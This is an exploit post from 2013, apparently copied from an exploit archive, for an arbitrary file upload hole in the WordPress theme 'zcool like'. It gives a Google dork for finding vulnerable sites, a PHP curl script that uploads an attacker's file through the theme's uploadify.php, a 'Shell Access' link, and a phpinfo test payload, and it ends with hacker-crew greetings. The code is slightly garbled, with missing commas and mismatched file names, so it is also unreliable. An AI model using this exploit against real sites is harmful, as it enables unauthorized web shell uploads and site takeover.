facebook facebook twitter rss

Wordpress Themes zcool like File Upload Vulnerability

Author: TrojanSpot , Published: 23-10-2013
############################################################################
# Title : Wordpress Themes zcool like File Upload Vulnerability
# Author : TrojanSpot
# Date : 23/10/2013
# Facebook => http://fb.me/AcehCyberTeams
# Vandor : N/a
# Google Dork => inurl:/wp-content/themes/zcool-like
# Tested on : Windows 7 , Mobile Windows Phone
############################################################################

Exploit : uploadshell.php

<?php
 
$uploadfile
="act.php";
$ch curl_init("http://localhost/wordpress/wp-content/themes/zcool_like/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
              array(
'Filedata'=>"@$uploadfile",
              
'folder'=>'/wp-content/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
 
  print 
"$postResult";
?> 
<br>
<br>
<a href="http://localhost/wordpress/wp-content/sa.php" style="color: red;">Shell Access</a>
--------------------------------------------------------------------------------------
<?php
phpinfo
();
?>

--------------------------------------------------------------------------------------

[#] Greeting ###################################################################################################################################################### #
./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./3vasteric-gt ./Aneuk Nanggroe ./Konoha ./mr.b4dm4sh ./SangYog ./Daiku dan Ban Mandum Saudara Lon Di Aceh Cyber Team #
################################################################################################################################################################
------------------------------ The End ------------------------------------------------------------------------------------------------------------

Like us on Facebook :